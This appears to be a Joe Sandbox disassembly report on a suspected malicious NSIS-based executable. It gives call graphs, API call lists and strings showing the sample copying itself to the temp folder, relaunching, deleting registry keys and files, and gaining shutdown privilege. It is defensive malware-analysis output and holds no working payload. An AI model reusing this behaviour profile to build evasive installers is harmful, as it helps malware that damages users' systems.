40149e 5994 4023a2 5993->5994 5995 4014ac PostQuitMessage 5993->5995 5995->5994 5996 401ba0 5997 401bf1 5996->5997 5998 401bad 5996->5998 6000 401bf6 5997->6000 6001 401c1b GlobalAlloc 5997->6001 5999 401c36 5998->5999 6005 401bc4 5998->6005 6003 4066bf 21 API calls 5999->6003 6009 4023a2 5999->6009 6000->6009 6017 406682 lstrcpynW 6000->6017 6002 4066bf 21 API calls 6001->6002 6002->5999 6006 40239c 6003->6006 6015 406682 lstrcpynW 6005->6015 6006->6009 6010 405ce2 MessageBoxIndirectW 6006->6010 6007 401c08 GlobalFree 6007->6009 6010->6009 6011 401bd3 6016 406682 lstrcpynW 6011->6016 6013 401be2 6018 406682 lstrcpynW 6013->6018 6015->6011 6016->6013 6017->6007 6018->6009 6019 406da0 6021 406c24 6019->6021 6020 40758f 6021->6020 6022 406ca5 GlobalFree 6021->6022 6023 406cae GlobalAlloc 6021->6023 6024 406d25 GlobalAlloc 6021->6024 6025 406d1c GlobalFree 6021->6025 6022->6023 6023->6020 6023->6021 6024->6020 6024->6021 6025->6024 6026 402621 6027 402dab 21 API calls 6026->6027 6028 402628 6027->6028 6031 406172 GetFileAttributesW CreateFileW 6028->6031 6030 402634 6031->6030 4302 4025a3 4314 402deb 4302->4314 4306 4025b6 4307 4025c5 4306->4307 4312 402933 4306->4312 4308 4025d2 RegEnumKeyW 4307->4308 4309 4025de RegEnumValueW 4307->4309 4310 4025fa RegCloseKey 4308->4310 4309->4310 4311 4025f3 4309->4311 4310->4312 4311->4310 4315 402dab 21 API calls 4314->4315 4316 402e02 4315->4316 4317 4064ef RegOpenKeyExW 4316->4317 4318 4025ad 4317->4318 4319 402d89 4318->4319 4320 4066bf 21 API calls 4319->4320 4321 402d9e 4320->4321 4321->4306 6032 4015a8 6033 402dab 21 API calls 6032->6033 6034 4015af SetFileAttributesW 6033->6034 6035 4015c1 6034->6035 4831 401fa9 4832 402dab 21 API calls 4831->4832 4833 401faf 4832->4833 4834 405707 28 API calls 4833->4834 4835 401fb9 4834->4835 4836 405c65 2 API calls 4835->4836 4837 401fbf 4836->4837 4838 401fe2 CloseHandle 4837->4838 4841 402933 4837->4841 4846 406b21 WaitForSingleObject 4837->4846 4838->4841 4842 401fd4 4843 401fe4 4842->4843 4844 401fd9 4842->4844 4843->4838 4851 4065c9 wsprintfW 4844->4851 4847 406b3b 4846->4847 4848 406b4d GetExitCodeProcess 4847->4848 4849 406ab2 2 API calls 4847->4849 4848->4842 4850 406b42 WaitForSingleObject 4849->4850 4850->4847 4851->4838 6043 404aab 6044 404ae1 6043->6044 6045 404abb 6043->6045 6047 404668 8 API calls 6044->6047 6046 404601 22 API calls 6045->6046 6048 404ac8 SetDlgItemTextW 6046->6048 6049 404aed 6047->6049 6048->6044 6050 40202f 6051 402dab 21 API calls 6050->6051 6052 402036 6051->6052 6053 406a76 5 API calls 6052->6053 6054 402045 6053->6054 6055 402061 GlobalAlloc 6054->6055 6056 4020d1 6054->6056 6055->6056 6057 402075 6055->6057 6058 406a76 5 API calls 6057->6058 6059 40207c 6058->6059 6060 406a76 5 API calls 6059->6060 6061 402086 6060->6061 6061->6056 6065 4065c9 wsprintfW 6061->6065 6063 4020bf 6066 4065c9 wsprintfW 6063->6066 6065->6063 6066->6056 6067 40252f 6068 402deb 21 API calls 6067->6068 6069 402539 6068->6069 6070 402dab 21 API calls 6069->6070 6071 402542 6070->6071 6072 40254d RegQueryValueExW 6071->6072 6075 402933 6071->6075 6073 402573 RegCloseKey 6072->6073 6074 40256d 6072->6074 6073->6075 6074->6073 6078 4065c9 wsprintfW 6074->6078 6078->6073 6079 4021af 6080 402dab 21 API calls 6079->6080 6081 4021b6 6080->6081 6082 402dab 21 API calls 6081->6082 6083 4021c0 6082->6083 6084 402dab 21 API calls 6083->6084 6085 4021ca 6084->6085 6086 402dab 21 API calls 6085->6086 6087 4021d4 6086->6087 6088 402dab 21 API calls 6087->6088 6089 4021de 6088->6089 6090 40221d CoCreateInstance 6089->6090 6091 402dab 21 API calls 6089->6091 6094 40223c 6090->6094 6091->6090 6092 401423 28 API calls 6093 4022fb 6092->6093 6094->6092 6094->6093 6095 401a35 6096 402dab 21 API calls 6095->6096 6097 401a3e ExpandEnvironmentStringsW 6096->6097 6098 401a52 6097->6098 6100 401a65 6097->6100 6099 401a57 lstrcmpW 6098->6099 6098->6100 6099->6100 4952 4023b7 4953 4023c5 4952->4953 4954 4023bf 4952->4954 4956 4023d3 4953->4956 4957 402dab 21 API calls 4953->4957 4955 402dab 21 API calls 4954->4955 4955->4953 4958 402dab 21 API calls 4956->4958 4960 4023e1 4956->4960 4957->4956 4958->4960 4959 402dab 21 API calls 4961 4023ea WritePrivateProfileStringW 4959->4961 4960->4959 6101 404737 lstrcpynW lstrlenW 6107 4014b8 6108 4014be 6107->6108 6109 401389 2 API calls 6108->6109 6110 4014c6 6109->6110 4965 402439 4966 402441 4965->4966 4967 40246c 4965->4967 4968 402deb 21 API calls 4966->4968 4969 402dab 21 API calls 4967->4969 4970 402448 4968->4970 4971 402473 4969->4971 4972 402452 4970->4972 4975 402480 4970->4975 4977 402e69 4971->4977 4974 402dab 21 API calls 4972->4974 4976 402459 RegDeleteValueW RegCloseKey 4974->4976 4976->4975 4978 402e76 4977->4978 4979 402e7d 4977->4979 4978->4975 4979->4978 4981 402eae 4979->4981 4982 4064ef RegOpenKeyExW 4981->4982 4983 402edc 4982->4983 4984 402f91 4983->4984 4985 402ee6 4983->4985 4984->4978 4986 402eec RegEnumValueW 4985->4986 4987 402f0f 4985->4987 4986->4987 4988 402f76 RegCloseKey 4986->4988 4987->4988 4989 402f4b RegEnumKeyW 4987->4989 4990 402f54 RegCloseKey 4987->4990 4993 402eae 6 API calls 4987->4993 4988->4984 4989->4987 4989->4990 4991 406a76 5 API calls 4990->4991 4992 402f64 4991->4992 4994 402f86 4992->4994 4995 402f68 RegDeleteKeyW 4992->4995 4993->4987 4994->4984 4995->4984 6111 40173a 6112 402dab 21 API calls 6111->6112 6113 401741 SearchPathW 6112->6113 6114 40175c 6113->6114 6115 7347103d 6116 7347101b 5 API calls 6115->6116 6117 73471056 6116->6117 6118 401d3d 6119 402d89 21 API calls 6118->6119 6120 401d44 6119->6120 6121 402d89 21 API calls 6120->6121 6122 401d50 GetDlgItem 6121->6122 6123 40263d 6122->6123

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 51 40383a-40383d 45->51 52 40383f 45->52 53 403884-403889 46->53 54 40389f-4038d9 46->54 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 51->46 51->52 52->46 53->54 61 40388b-403893 53->61 57 4038e1-4038e3 54->57 58 4038db-4038df 54->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->54 66->67 67->54 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 87 403a5d-403a83 call 405c4d lstrlenW call 406682 83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 105 403a2e-403a44 call 406682 * 2 86->105 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 96 403a06-403a0a 91->96 97 4039ff-403a04 91->97 92->93 103 403c36-403c41 ExitWindowsEx 93->103 104 403c2a-403c34 93->104 96->91 102 403a0c 96->102 97->96 97->102 102->83 103->84 108 403c43-403c45 call 40140b 103->108 104->103 104->108 105->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 131 403b21-403b2c 129->131 132 403b02-403b0b DeleteFileW 129->132 131->116 134 403b2e 131->134 132->131 133 403b0d-403b1f call 405d8e 132->133 133->118 133->131 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 00403668
                                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                                  • OleInitialize.OLE32(00000000), ref: 00403783
                                                                  • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                                  • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",00000020,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403945
                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403961
                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                                  • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                                    • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                  • wsprintfW.USER32 ref: 00403AC4
                                                                  • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                                  • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                                    • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\x6yDsHJ9tr.exe,0042C800,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                                    • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                    • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                    • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
                                                                    • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                                  • ExitProcess.KERNEL32 ref: 00403BB2
                                                                  • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                                  • ExitProcess.KERNEL32 ref: 00403C5C
                                                                    • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\x6yDsHJ9tr.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
                                                                  • API String ID: 1813718867-642564250
                                                                  • Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                  • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                                  • Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                  • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 357 405d8e-405db4 call 406059 360 405db6-405dc8 DeleteFileW 357->360 361 405dcd-405dd4 357->361 362 405f4a-405f4e 360->362 363 405dd6-405dd8 361->363 364 405de7-405df7 call 406682 361->364 365 405ef8-405efd 363->365 366 405dde-405de1 363->366 370 405e06-405e07 call 405f9d 364->370 371 405df9-405e04 lstrcatW 364->371 365->362 369 405eff-405f02 365->369 366->364 366->365 372 405f04-405f0a 369->372 373 405f0c-405f14 call 4069df 369->373 375 405e0c-405e10 370->375 371->375 372->362 373->362 381 405f16-405f2a call 405f51 call 405d46 373->381 378 405e12-405e1a 375->378 379 405e1c-405e22 lstrcatW 375->379 378->379 380 405e27-405e43 lstrlenW FindFirstFileW 378->380 379->380 382 405e49-405e51 380->382 383 405eed-405ef1 380->383 397 405f42-405f45 call 405707 381->397 398 405f2c-405f2f 381->398 385 405e71-405e85 call 406682 382->385 386 405e53-405e5b 382->386 383->365 388 405ef3 383->388 399 405e87-405e8f 385->399 400 405e9c-405ea7 call 405d46 385->400 389 405ed0-405ee0 FindNextFileW 386->389 390 405e5d-405e65 386->390 388->365 389->382 396 405ee6-405ee7 FindClose 389->396 390->385 393 405e67-405e6f 390->393 393->385 393->389 396->383 397->362 398->372 401 405f31-405f40 call 405707 call 406442 398->401 399->389 402 405e91-405e9a call 405d8e 399->402 408 405ec8-405ecb call 405707 400->408 409 405ea9-405eac 400->409 401->362 402->389 408->389 412 405ec0-405ec6 409->412 413 405eae-405ebe call 405707 call 406442 409->413 412->389 413->389
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405DB7
                                                                  • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405DFF
                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405E22
                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405E28
                                                                  • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405E38
                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                                  • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$POB$\*.*
                                                                  • API String ID: 2035342205-234688369
                                                                  • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                  • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                                  • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                  • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 713 406da0-406da5 714 406e16-406e34 713->714 715 406da7-406dd6 713->715 716 40740c-407421 714->716 717 406dd8-406ddb 715->717 718 406ddd-406de1 715->718 719 407423-407439 716->719 720 40743b-407451 716->720 721 406ded-406df0 717->721 722 406de3-406de7 718->722 723 406de9 718->723 724 407454-40745b 719->724 720->724 725 406df2-406dfb 721->725 726 406e0e-406e11 721->726 722->721 723->721 730 407482-40748e 724->730 731 40745d-407461 724->731 727 406e00-406e0c 725->727 728 406dfd 725->728 729 406fe3-407001 726->729 733 406e76-406ea4 727->733 728->727 734 407003-407017 729->734 735 407019-40702b 729->735 738 406c24-406c2d 730->738 736 407610-40761a 731->736 737 407467-40747f 731->737 740 406ec0-406eda 733->740 741 406ea6-406ebe 733->741 742 40702e-407038 734->742 735->742 739 407626-407639 736->739 737->730 743 406c33 738->743 744 40763b 738->744 745 40763e-407642 739->745 746 406edd-406ee7 740->746 741->746 747 40703a 742->747 748 406fdb-406fe1 742->748 751 406c3a-406c3e 743->751 752 406d7a-406d9b 743->752 753 406cdf-406ce3 743->753 754 406d4f-406d53 743->754 744->745 756 406eed 746->756 757 406e5e-406e64 746->757 749 406fb6-406fba 747->749 750 40714b-407158 747->750 748->729 755 406f7f-406f89 748->755 765 406fc0-406fd8 749->765 766 4075c2-4075cc 749->766 750->738 751->739 758 406c44-406c51 751->758 752->716 767 406ce9-406d02 753->767 768 40758f-407599 753->768 759 406d59-406d6d 754->759 760 40759e-4075a8 754->760 761 4075ce-4075d8 755->761 762 406f8f-406fb1 755->762 774 406e43-406e5b 756->774 775 4075aa-4075b4 756->775 763 406f17-406f1d 757->763 764 406e6a-406e70 757->764 758->744 772 406c57-406c9d 758->772 773 406d70-406d78 759->773 760->739 761->739 762->750 770 406f7b 763->770 771 406f1f-406f3d 763->771 764->733 764->770 765->748 766->739 776 406d05-406d09 767->776 768->739 770->755 777 406f55-406f67 771->777 778 406f3f-406f53 771->778 779 406cc5-406cc7 772->779 780 406c9f-406ca3 772->780 773->752 773->754 774->757 775->739 776->753 781 406d0b-406d11 776->781 782 406f6a-406f74 777->782 778->782 785 406cd5-406cdd 779->785 786 406cc9-406cd3 779->786 783 406ca5-406ca8 GlobalFree 780->783 784 406cae-406cbc GlobalAlloc 780->784 787 406d13-406d1a 781->787 788 406d3b-406d4d 781->788 782->763 791 406f76 782->791 783->784 784->744 792 406cc2 784->792 785->776 786->785 786->786 789 406d25-406d35 GlobalAlloc 787->789 790 406d1c-406d1f GlobalFree 787->790 788->773 789->744 789->788 790->789 794 4075b6-4075c0 791->794 795 406efc-406f14 791->795 792->779 794->739 795->763
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                  • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                                  • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                  • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
                                                                  • FindClose.KERNEL32(00000000), ref: 004069F6
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 004069DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
